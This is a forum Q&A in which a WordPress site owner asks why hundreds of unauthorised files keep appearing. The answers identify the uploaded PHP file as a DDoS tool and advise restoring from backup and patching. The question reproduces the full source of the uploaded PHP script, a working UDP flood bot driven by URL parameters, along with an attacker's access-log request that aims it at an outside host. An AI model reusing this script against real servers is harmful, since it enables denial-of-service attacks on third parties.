# Wordpress Site or Server getting hacked with huge amount of php and html files uploaded

Tags: php, linux, wordpress, security, server

I am having a big issue with a person that is uploading files without my permission on the root of my website. I have tried

1. blocking the ip's, updating wordpress (4.1.1)
2. adding a plugin like better wp security and configured it correctly
3. removing each file that he uploaded and still I am getting hundreds of files every hour, what could it be. The log looks like this:
4. Changing permissions of public ftp to 750.

This is the log

```
112.6.228.87 - - [13/Apr/2015:13:40:13 +0100] "GET /ctioVp.php?host=37.157.198.94&port=8888&time=90&rat=0&len=65536 HTTP/1.1" 404 10352 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
61.152.102.40 - - [13/Apr/2015:13:40:19 +0100] "GET /aaadqm/6204-imvh.html HTTP/1.0" 200 12107 "http://.co.uk/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5"
95.158.139.48 - - [13/Apr/2015:13:40:43 +0100] "GET /aaadqm/6204-imvh.html HTTP/1.1" 200 12107 "http://.co.uk/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5"
95.158.139.48 - - [13/Apr/2015:13:40:43 +0100] "GET /aaadqm/9970-ywek.html HTTP/1.1" 200 12347 "http://.co.uk/aaadqm/6204-imvh.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5"
```

And there are more ip's (static) and more files and folders. I am hosting on my own the website and have WHM and Cpanel.

ctioVp.php looks like this:

```
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = $_GET['len'];
ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0)
{
    if (StrLen($_GET['rat'])<>0)
    {
        echo php_uname();
        exit;
    }
    exit;
}

for($i=0; $i < $Sendlen; $i++)
{
    $out .= "A";
}

$max_time = time() + $exec_time;
while(1)
{
    if(time() > $max_time)
    {
        break;
    }
    $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
    if($fp)
    {
        fwrite($fp, $out);
        fclose($fp);
    }
}
```

And the rest of the files are html files with Chinese content.

Comment: Suggest you talk to your hosting company

Answer (score 4):

The Script you've posted is used to flood a given server with UDP packages (aka DDOS).

The Problem with a compromised server is that you don't know what the attacker did. Maybe he installed a root kit or something alike.

The only safe way to recover from this is to take the server offline, and start over with a non compromised backup.

See also https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server

Comment: This is the correct answer. Log in via ssh and run `w` and `last`

Answer (score 1):

I agree that the best way to recover is restore a full server backup, but in this instance, I think it's unlikely that the server itself was compromised, since it'll require a privilege escalation vulnerability in apache or other components. The most likely cause is a vulnerability in Wordpress.

Reinstalling a clean site backup (both files and database) is the best method for getting rid of malicious content. Whether you go for full server restore, WP restore or file cleanup, you still have to take care of the root cause. Alongside what you already did you should:

- Change your passwords.
- Update all your plugins **and** themes, which are often overlooked but also are attack vectors, since they can bundle vulnerable components.
  [wpvulndb.com](https://wpvulndb.com/) might help identify those.